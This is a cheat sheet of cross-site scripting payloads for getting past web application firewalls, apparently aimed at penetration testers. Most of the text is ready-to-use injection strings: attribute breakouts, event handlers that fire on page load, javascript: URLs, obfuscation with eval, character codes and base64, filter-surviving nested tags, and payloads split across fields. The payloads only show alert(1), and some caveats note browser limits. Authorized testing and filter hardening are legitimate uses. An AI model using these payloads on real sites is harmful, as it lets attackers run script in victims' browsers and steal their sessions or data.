🔭XSS WAF Bypass Trick

Basic Modification

These are variants of the normal payload. If the WAF blocks the literal strings <script>, alert or </script>, try these instead.

<script >alert(1)</script>
<script>window['al'+'ert']()</script>
<script>top[`alert`]()</script>
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
<ScRipT>alert(1)</sCriPt>
<%00script>alert(1)</script>
<script>al%00ert(1)</script>
<img src=x onerror="js:abc='al'+'ert(1)';eval(abc)" />
<script>window[['a','l','e','r','t'].toString().replaceAll(',',"")]()</script>
<script>window[['conf','irm'].toString().replaceAll(',',"")]()</script>
<script>abc='\x61\x6C\x65\x72\x74';this[abc]()</script>
<script>window['\x61\x6C\x65\x72\x74']()</script>
<script>window[['\x61\x6C\x65\x72\x74'].toString().replaceAll(",","")]()</script>
<script>abc='aLerT()';eval(abc.toLowerCase())</script>
<script>abc='YWxlcnQoKQ==';eval(atob(abc))</script>
<script>abc='CoNFirM()';eval(abc.toLowerCase())</script>

Try adding stray whitespace inside the tag (between the tag name and >) to defeat a rule that matches the exact string <script>.

Try HTML-encoded whitespace (&#9, &#10, &#13) and null bytes (%00) inside the tag name. An HTML5 parser does not decode character references inside a tag name and turns a NUL into U+FFFD, so these variants only fire when some layer between the WAF and the browser (the application or a proxy) decodes or strips those bytes after the WAF has inspected the request.

Attributes and Tags

<input type ="text" name="input" value="hello">

Assume your input is reflected inside the value attribute of a tag like this one. A payload that begins with "> closes the attribute and the tag early (the application is left with an empty value), and everything after it is parsed as new HTML.

Try writing the XSS test payload in that position (the tag name is a placeholder; in practice it is whatever tag the application reflects your input into):

<random tag type="text" name="input" value="><script>alert(1)</script>

When you are injecting the whole tag, try changing the case of the tag name, replacing the space after it with a slash, or putting HTML-encoded whitespace between the tag name and the first attribute:

<iNpUt type="text" name="input" value="><script>alert(1)</script>
<input/type="text" name="input" value="><script>alert(1)</script>
<input&#9type="text" name="input" value="><script>alert(1)</script>
<input&#10type="text" name="input" value="><script>alert(1)</script>
<input&#13type="text" name="input" value="><script>alert(1)</script>

Try inserting a null byte (%00) at different positions, such as before or inside the tag name:

<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>

Null bytes can be tried inside attribute names and attribute values as well:

<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>

As with the script-tag variants, the encoded-whitespace and null-byte forms depend on something between the WAF and the browser decoding or dropping those bytes: an HTML5 parser keeps &#9 inside a tag name as literal characters, turns a NUL into U+FFFD, and a NUL inside JavaScript is a syntax error.

Event Handlers

<input onsubmit=alert(1)>

An event handler attribute runs its JavaScript when the event fires. onsubmit fires when a form is submitted, so this one needs a real form and a user action before anything happens.

If onsubmit does not work (or is blocked), try handlers that fire on their own as the page loads, with no user interaction:

<audio src="new.mp3" onerror=alert(1)>
<video src="new.mp4" onerror=alert(1)>
<svg width="200" height="100" onload=alert(1)>

audio, video and svg are HTML5 elements, so these work in any HTML5 browser, and a filter that only knows the classic img onerror variant may let them through. onerror fires because the referenced media file does not exist; svg onload fires as soon as the element is parsed.

Delimiters & Brackets

<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>

A delimiter is one or more characters that separate tokens; in a tag that means the quotes around an attribute value and the whitespace between attributes. Try both single and double quotes, and note that the closing quote already separates the handler from the next attribute, so no space is needed before src.

<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>

Try HTML-encoded quotes (&#34 is ", &#39 is '). A browser does not treat a character reference as a quote, so these only work when the application decodes the entities before the markup reaches the browser; they are aimed at the WAF, not at the parser.

<img onerror=`alert(1)`src=x>
<img onerror=&#96alert(1)&#96src=x>
<img src=`x`onerror=alert(1)>

Try the backtick (grave accent), plain or encoded (&#96), as the delimiter. Only old versions of Internet Explorer accepted backticks as attribute delimiters; an HTML5 parser keeps them as part of an unquoted value, so treat these as legacy payloads.

Like delimiters, the angle brackets themselves are something a filter keys on, and loosening them can get a payload past it.

<input onsubmit=alert(1)<

Try leaving the tag open with an extra < instead of the closing >. A filter that looks for a complete <...> pair may not match, while the browser's parser is forgiving and finishes the tag from whatever follows; because the handler value is JavaScript, a // after alert(1) comments out anything the application appends after it, such as its own closing bracket.

«input onsubmit=alert(1)»

Try different bracket characters.

&#174input onsubmit=alert(1)&#175

Try different characters in place of the brackets, encoded or not (note that &#174 and &#175 decode to ® and ¯; « and » are &#171 and &#187). Payloads like these only become HTML when some layer normalises or best-fit-converts the unusual characters to < and >, for example a charset conversion inside the application, so check how the page renders them before relying on them.

Pseudo Protocols

<a href="https://www.google.com">Click Here</a>

A hyperlink takes the user to another URL with one click. The href is a URL, and a URL can use the javascript: pseudo-protocol.

Try injecting a javascript: URL into any attribute that takes a URL as its value:

<img src=javascript:alert(1)>
<form action=javascript:alert(1)>
<object data=javascript:alert(1)>
<button formaction=javascript:alert(1)>
<video src=javascript:alert(1)>

Other URL-valued attributes can be used in the same way (href, iframe src, embed src, and so on). Current browsers only run javascript: URLs on navigation: href, form action and formaction fire when the user clicks or submits, while img and video src are fetched as resources and never execute the script in a modern browser.

Existing JavaScript & Character Escaping

<script>var a = 'myteststring';</script>

Suppose your input is reflected into an existing JavaScript string like this. Try injecting '; alert(1); //

The script still runs: your quote closes the string, alert(1) executes as its own statement, and // comments out the rest of the original line (including the application's closing quote), so nothing is left over to cause a syntax error.

<script>var a = '\\'; alert(1); //

Escaping characters help too. If the application escapes your quote as \' but leaves backslashes alone, inject \'; alert(1); // instead: after escaping it becomes the line above, where \\ is a literal backslash and the quote is free to terminate the string.

<script>a\u006cert(1)</script>

Unicode escapes are allowed inside JavaScript identifiers, so a\u006cert is the same identifier as alert to the engine, while a filter matching the literal string alert does not see it.

Dynamic String Construction & Eval()

eval('1 + 1')

JavaScript's eval() executes a string as code; this call evaluates to 2. Because the string can be assembled at run time, the blocked word never has to appear literally in the request.

<script>eval('a\u006cert(1)')</script>
<script>eval('al' +'ert(1)')</script>
<script>eval(String.fromCharCode(97, 108, 101,114, 116, 40, 49, 41))</script>

Unicode escapes work inside the string just as they do in identifiers. If the literal characters are blocked, produce them another way: String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) builds the string alert(1) from character codes. fromCharCode() is not a substitute for eval(); it only constructs the string, and eval(), setTimeout() or the Function constructor still has to execute it.

Meta Refresh & File Renaming

A page can tell the browser to load another URL after a delay, and that URL can be a javascript: URL:

<meta http-equiv="refresh" content="0;url=javascript:alert(1);">

Current browsers refuse javascript: URLs in a meta refresh, so this is mainly useful against older clients.

<script src="payload.jpg"></script>

If you can only upload image files, try renaming the script to an image extension and loading it with a script src: the browser executes the response body as JavaScript regardless of the file name, unless the server sends X-Content-Type-Options: nosniff together with a non-JavaScript Content-Type.

Sanitization & Length Limits

<script><script>alert(1)</script>

Try doubling the tag: some applications remove only the first occurrence of <script>, leaving a working tag behind.

<sc<script>ript>alert(1)</script>

Any tag can be nested as the sacrificial first instance; once the filter strips the inner <script>, the surrounding characters close up into <script> again. A filter has to strip repeatedly until nothing changes (or, better, encode rather than strip) to resist this.

If the payload is rejected because of a length limit on the field, split it across several fields that end up on the same page:

<input type="hidden" name="id" value=""><script>/*">
<input type="hidden" name="checksum" value="*/alert(1)/*">
<input type="hidden" name="status" value="*/</script>"

Everything between /* and */ is a JavaScript comment, so the application's own markup between the fields is commented out and the browser sees one script whose only statement is alert(1), as if the whole payload had been injected in a single place.
